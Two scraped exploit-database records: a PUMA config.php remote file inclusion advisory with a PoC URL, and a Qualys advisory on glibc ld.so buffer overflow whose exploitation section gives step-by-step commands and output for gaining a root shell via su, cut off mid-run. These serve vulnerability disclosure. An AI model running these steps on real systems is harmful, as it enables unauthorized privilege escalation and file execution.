{"hash": "3fad2c51a5b3e3760c196b8d118dc3267738a074b536caeb76bfb3dd7ad3040c", "id": "1337DAY-ID-810", "lastseen": "2018-01-02T09:16:10", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "493c75c2e2042c46e3209de5118c6257", "key": "href"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "modified"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "26c62c096c6171182870a67e22db5394", "key": "reporter"}, {"hash": "a4f207d32f3ad469091abc24ae9485ce", "key": "sourceData"}, {"hash": "a62ba200e34051f0012a9fe9274b04ac", "key": "sourceHref"}, {"hash": "91971c66e3b750ed4b161c562a30d822", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "45d795a92d0f78833543abfb63b228c345444d39e133421d1ba988cbebdf4601", "id": "1337DAY-ID-810", "lastseen": "2016-04-19T23:50:14", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-19T23:50:14"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3d3c905a099f5447524f85595a7b5b65", "key": "sourceData"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "modified"}, {"hash": "26c62c096c6171182870a67e22db5394", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "45ec6c125d686003653f49229c473465", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "229c757ab285c181e82f096e9899c882", "key": "href"}, {"hash": "91971c66e3b750ed4b161c562a30d822", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "http://0day.today/exploit/description/810"}, "lastseen": "2016-04-19T23:50:14", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "https://0day.today/exploit/description/810"}

{"result": {"zdt": [{"lastseen": "2018-04-02T09:35:47", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 1, "reporter": "Qualys Corporation", "published": "2017-12-14T00:00:00", "title": "glibc ld.so - Memory Leak / Buffer Overflow Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10004"], "modified": "2017-12-14T00:00:00", "href": "https://0day.today/exploit/description/29207", "id": "1337DAY-ID-29207", "sourceData": "Qualys Security Advisory\r\n \r\nBuffer overflow in glibc's ld.so\r\n \r\n \r\n========================================================================\r\nContents\r\n========================================================================\r\n \r\nSummary\r\nMemory Leak\r\nBuffer Overflow\r\nExploitation\r\nAcknowledgments\r\n \r\n \r\n========================================================================\r\nSummary\r\n========================================================================\r\n \r\nWe have discovered a memory leak and a buffer overflow in the dynamic\r\nloader (ld.so) of the GNU C Library (glibc):\r\n \r\n- the memory leak (CVE-2017-1000408) first appeared in glibc 2.1.1\r\n (released on May 24, 1999) and can be reached and amplified through\r\n the LD_HWCAP_MASK environment variable;\r\n \r\n- the buffer overflow (CVE-2017-1000409) first appeared in glibc 2.5\r\n (released on September 29, 2006) and can be triggered through the\r\n LD_LIBRARY_PATH environment variable.\r\n \r\nFurther investigation showed that:\r\n \r\n- the buffer overflow is not exploitable if\r\n /proc/sys/fs/protected_hardlinks is enabled (it is not enabled by\r\n default on vanilla Linux kernels, but most Linux distributions turn it\r\n on by default);\r\n \r\n- the memory leak and the buffer overflow are not exploitable if the\r\n glibc is patched against CVE-2017-1000366, because this patch ignores\r\n the LD_HWCAP_MASK and LD_LIBRARY_PATH environment variables when SUID\r\n binaries are executed (CVE-2017-1000366 was first patched in glibc\r\n 2.26, released on August 2, 2017, but most Linux distributions had\r\n already backported this patch on June 19, 2017).\r\n \r\nWe have therefore rated the impact of these vulnerabilities as Low.\r\nNevertheless, we give a brief analysis of the vulnerable function, and\r\npresent a simple method for exploiting a SUID binary on the command line\r\nand obtaining full root privileges (if /proc/sys/fs/protected_hardlinks\r\nis not enabled, and CVE-2017-1000366 is not patched).\r\n \r\n \r\n========================================================================\r\nMemory Leak (CVE-2017-1000408)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so malloc()ates \"rtld_search_dirs.dirs[0]\", a\r\ncache of information about the system's trusted directories (typically\r\n\"/lib\" and \"/usr/lib\" on 32-bit or \"/lib64\" and \"/usr/lib64\" on 64-bit).\r\nTo compute the number of system directories, ld.so uses the classic C\r\nidiom \"sizeof (system_dirs) / sizeof (system_dirs[0])\":\r\n \r\n 691 rtld_search_dirs.dirs[0] = (struct r_search_path_elem *)\r\n 692 malloc ((sizeof (system_dirs) / sizeof (system_dirs[0]))\r\n 693 * round_size * sizeof (struct r_search_path_elem));\r\n \r\nUnfortunately, \"system_dirs\" is not a classic array: it is not an array\r\nof strings (pointers to characters), but rather an array of characters,\r\nthe concatenation of all system directories, separated by null bytes:\r\n \r\n 109 static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\nwhere \"SYSTEM_DIRS\" is generated by \"gen-trusted-dirs.awk\" (typically\r\n\"/lib/\\0/usr/lib/\" on 32-bit or \"/lib64/\\0/usr/lib64/\" on 64-bit). As a\r\nresult, the number of system directories is overestimated, and too much\r\nmemory is allocated for \"rtld_search_dirs.dirs[0]\": if \"system_dirs\" is\r\n\"/lib/\\0/usr/lib/\" for example, the number of system directories is 2,\r\nbut 16 is used instead (the number of characters in \"system_dirs\") to\r\ncompute the size of \"rtld_search_dirs.dirs[0]\".\r\n \r\nThis extra memory is never accessed, never freed, and mostly filled with\r\nnull bytes, because only the information about \"nsystem_dirs_len\" system\r\ndirectories (the correct number of system directories) is written to\r\n\"rtld_search_dirs.dirs[0]\", and because the minimal malloc()\r\nimplementation in ld.so calls mmap(), but never munmap().\r\n \r\nMoreover, this memory leak can be amplified through the LD_HWCAP_MASK\r\nenvironment variable, because ld.so uses \"ncapstr\" (the total number of\r\nhardware-capability combinations) to compute the size of\r\n\"rtld_search_dirs.dirs[0]\":\r\n \r\n 687 round_size = ((2 * sizeof (struct r_search_path_elem) - 1\r\n 688 + ncapstr * sizeof (enum r_dir_status))\r\n 689 / sizeof (struct r_search_path_elem));\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit ab7eb292307152e706948a7b19164ff5e6d593d4\r\nDate: Mon May 3 21:59:35 1999 +0000\r\n \r\n Update.\r\n \r\n * elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk.\r\n * elf/gen-trusted-dirs.awk: New file.\r\n * elf/dl-load.c (systems_dirs): Moved into file scope. Initialize\r\n from SYSTEM_DIRS macro.\r\n (system_dirs_len): New variable. Contains lengths of system_dirs\r\n strings.\r\n (fillin_rpath): Rewrite for systems_dirs being a simple string.\r\n Improve string comparisons. Change parameter trusted to be a flag.\r\n Change all callers.\r\n (_dt_init_paths): Improve using new format for system_dirs.\r\n \r\nwhich transformed \"system_dirs\" from an array of strings (pointers to\r\ncharacters) into an array of characters:\r\n \r\n- static const char *system_dirs[] =\r\n- {\r\n-#include \"trusted-dirs.h\"\r\n- NULL\r\n- };\r\n...\r\n+static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\n \r\n========================================================================\r\nBuffer Overflow (CVE-2017-1000409)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so computes \"nllp\", the number of\r\ncolon-separated directories in \"llp\" (the LD_LIBRARY_PATH environment\r\nvariable), malloc()ates \"env_path_list.dirs\", an array of \"nllp + 1\"\r\npointers to \"r_search_path_elem\" structures (one for each directory in\r\n\"llp\", plus a terminating NULL pointer), and calls fillin_rpath() to\r\nfill in \"env_path_list.dirs\":\r\n \r\n 777 if (llp != NULL && *llp != '\\0')\r\n 778 {\r\n 779 size_t nllp;\r\n 780 const char *cp = llp;\r\n 781 char *llp_tmp;\r\n ...\r\n 803 nllp = 1;\r\n 804 while (*cp)\r\n 805 {\r\n 806 if (*cp == ':' || *cp == ';')\r\n 807 ++nllp;\r\n 808 ++cp;\r\n 809 }\r\n 810 \r\n 811 env_path_list.dirs = (struct r_search_path_elem **)\r\n 812 malloc ((nllp + 1) * sizeof (struct r_search_path_elem *));\r\n ...\r\n 819 (void) fillin_rpath (llp_tmp, env_path_list.dirs, \":;\",\r\n 820 __libc_enable_secure, \"LD_LIBRARY_PATH\",\r\n 821 NULL, l);\r\n \r\nUnfortunately, ld.so parses the \"llp\" string to compute \"nllp\" but\r\nparses the \"llp_tmp\" string (an expanded copy of \"llp\") to fill in\r\n\"env_path_list.dirs\". As a result, the number of pointers written to\r\n\"env_path_list.dirs\" can be greater than \"nllp + 1\" (an mmap()-based\r\nbuffer overflow) if the contents of \"llp_tmp\" differ from the contents\r\nof \"llp\" (if \"llp_tmp\" contains more colons than \"llp\"):\r\n \r\n 784 /* Expand DSTs. */\r\n 785 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 786 if (__glibc_likely (cnt == 0))\r\n 787 llp_tmp = strdupa (llp);\r\n 788 else\r\n 789 {\r\n 790 /* Determine the length of the substituted string. */\r\n 791 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 792 \r\n 793 /* Allocate the necessary memory. */\r\n 794 llp_tmp = (char *) alloca (total + 1);\r\n 795 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 796 }\r\n \r\nThe Dynamic String Tokens (DSTs) $LIB and $PLATFORM are expanded to\r\nfixed strings that do not contain colons (typically \"lib\" and \"i686\" on\r\n32-bit or \"lib64\" and \"x86_64\" on 64-bit), but the expansion of $ORIGIN\r\n(the directory of the binary being executed) can inject extra colons\r\ninto \"llp_tmp\" and hence extra pointers into \"env_path_list.dirs\".\r\n \r\nTo exploit this buffer overflow, a local attacker must therefore be able\r\nto:\r\n \r\n- hard-link a SUID binary into a directory whose pathname contains\r\n colons (i.e., /proc/sys/fs/protected_hardlinks must not be enabled);\r\n \r\n- pass the LD_LIBRARY_PATH environment variable to _dl_init_paths()\r\n (i.e., CVE-2017-1000366 must not be patched).\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit 950398e1320255572f4228db94344dcd5f613455\r\nDate: Tue Aug 29 01:44:27 2006 +0000\r\n \r\n * elf/dl-load.c (_dl_init_paths): Expand DSTs.\r\n \r\nwhich added the expansion of llp's Dynamic String Tokens (DSTs) to\r\n_dl_init_paths():\r\n \r\n- char *llp_tmp = strdupa (llp);\r\n+ char *llp_tmp;\r\n...\r\n+ /* Expand DSTs. */\r\n+ size_t cnt = DL_DST_COUNT (llp, 1);\r\n+ if (__builtin_expect (cnt == 0, 1))\r\n+ llp_tmp = strdupa (llp);\r\n+ else\r\n+ {\r\n+ /* Determine the length of the substituted string. */\r\n+ size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n+\r\n+ /* Allocate the necessary memory. */\r\n+ llp_tmp = (char *) alloca (total + 1);\r\n+ llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n+ }\r\n \r\n \r\n========================================================================\r\nExploitation\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nDebian 9 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit the SUID-root binary \"su\" on a 32-bit Debian\r\n9.0: we installed \"debian-9.0.0-i386-xfce-CD-1.iso\" (the last release\r\nbefore glibc's CVE-2017-1000366 was patched), and manually disabled\r\nprotected_hardlinks (\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n1/ First, we identify the system's trusted directories (the only\r\ndirectories accepted by fillin_rpath() when executing a SUID binary):\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 1607: find library=nonexistent [0]; searching\r\n 1607: search cache=/etc/ld.so.cache\r\n 1607: search path=/lib/i386-linux-gnu/tls/i686:/lib/i386-linux-gnu/tls:/lib/i386-linux-gnu/i686:/lib/i386-linux-gnu:/usr/lib/i386-linux-gnu/tls/i686:/usr/lib/i386-linux-gnu/tls:/usr/lib/i386-linux-gnu/i686:/usr/lib/i386-linux-gnu:/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 1607: trying file=/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/i686/nonexistent\r\n \r\nThe \"system search path\" line shows four system directories:\r\n\"/lib/i386-linux-gnu\", \"/usr/lib/i386-linux-gnu\", \"/lib\", and \"/usr/lib\"\r\n(\"tls\" and \"i686\" are default hardware capabilities that are enabled\r\neven if LD_HWCAP_MASK is 0).\r\n \r\n2/ Second, we create our $ORIGIN directory and hard-link the SUID-root\r\nbinary \"su\" into it:\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\nThe pathname of our $ORIGIN directory contains two system directories:\r\nwe will write 12 bytes (3 pointers: one for each system directory, plus\r\na terminating NULL pointer) to an 8-byte \"env_path_list.dirs\" (\"nllp\" is\r\nonly 1, because our unexpanded LD_LIBRARY_PATH does not contain colons).\r\nIn other words, we will overflow \"env_path_list.dirs\" and write 4 bytes\r\n(the terminating NULL pointer) out of bounds.\r\n \r\n3/ Third, we overwrite this out-of-bounds NULL pointer with the first\r\nbytes of an error message (\"cannot open shared object file\") that is\r\nmalloc()ated after \"env_path_list.dirs\" because of our \"nonexistent\"\r\npreload library. Consequently, ld.so crashes when open_path() tries to\r\nopen our second preload library \"rootshell.so\" in a directory described\r\nby an \"r_search_path_elem\" structure located at the unmapped address\r\n0x6e6e6163 (the overwritten NULL pointer):\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[70632.888695] su[2293]: segfault at 6e6e6173 ip b77e1c43 sp bfc946dc error 4 in ld-2.24.so[b77db000+22000]\r\n \r\nThe \"/../../../../../../../../$LIB\" suffix is required, to pass the\r\n\"check_for_trusted\" test in _dl_dst_substitute() (our expanded\r\nLD_LIBRARY_PATH must be rooted in one of the system's trusted\r\ndirectories).\r\n \r\n4/ Next, we copy the library dependencies of \"su\" to our current working\r\ndirectory, and compile our preload library \"rootshell.so\" (\"la.c\" can be\r\nfound at the beginning of our stack-clash exploit \"Linux_ldso_hwcap.c\"):\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\nThis \"chmod\" is required, to pass the SUID-bit test in open_path().\r\n \r\n5/ Last, we run \"su\" with an increasing number of hardware capabilities\r\n(i.e., with an increasingly large \"rtld_search_dirs.dirs[0]\"), until the\r\n\"rtld_search_dirs.dirs[0]\" occupies the address 0x6e6e6163. Because this\r\n\"rtld_search_dirs.dirs[0]\" is mostly filled with null bytes, and because\r\nan \"r_search_path_elem\" structure filled with null bytes is equivalent\r\nto the current working directory in open_path(), ld.so will eventually\r\nload and execute our \"rootshell.so\" from the current working directory:\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.715s\r\nuser 0m0.120s\r\nsys 0m0.588s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.443s\r\nuser 0m0.368s\r\nsys 0m1.072s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.840s\r\nuser 0m0.656s\r\nsys 0m2.172s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<23)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m5.778s\r\nuser 0m1.200s\r\nsys 0m4.576s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<24)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m11.589s\r\nuser 0m2.520s\r\nsys 0m9.060s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m28.050s\r\nuser 0m6.140s\r\nsys 0m21.892s\r\n \r\n6/ Improvements in the running time of this exploit are left as an\r\nexercise for the interested reader:\r\n \r\n$ env -i LD_LIBRARY_PATH=. LD_PRELOAD=nonexistent LD_HWCAP_MASK=\"$(((1<<25)-1))\" LD_DEBUG=libs env 2>&1 | head -c 1000\r\n 3084: find library=nonexistent [0]; searching\r\n 3084: search path=./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mc\r\n \r\n$ mkdir -p './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ mv -- *.so* './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m23.485s\r\nuser 0m5.244s\r\nsys 0m18.220s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m11.352s\r\nuser 0m2.844s\r\nsys 0m8.388s\r\n \r\n------------------------------------------------------------------------\r\nCentOS 7 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit \"su\" on a 32-bit CentOS 7.3.1611: we\r\ninstalled \"CentOS-7-i386-Minimal-1611.iso\" (the last release before\r\nCVE-2017-1000366 was patched), and manually disabled protected_hardlinks\r\n(\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 17896: find library=nonexistent [0]; searching\r\n 17896: search cache=/etc/ld.so.cache\r\n 17896: search path=/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 17896: trying file=/lib/tls/i686/nonexistent\r\n 17896: trying file=/lib/tls/nonexistent\r\n 17896: trying file=/lib/i686/nonexistent\r\n 17896: trying file=/lib/nonexistent\r\n 17896: trying file=/usr/lib/tls/i686/nonexistent\r\n 17896: trying file=/usr/lib/tls/nonexistent\r\n 17896: trying file=/usr/lib/i686/nonexistent\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[ 8414.911000] su[18088]: segfault at 6e6e6173 ip b77645e2 sp bfe0cb40 error 4 in ld-2.17.so[b775f000+1f000]\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.527s\r\nuser 0m0.085s\r\nsys 0m0.441s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.060s\r\nuser 0m0.182s\r\nsys 0m0.877s\r\n 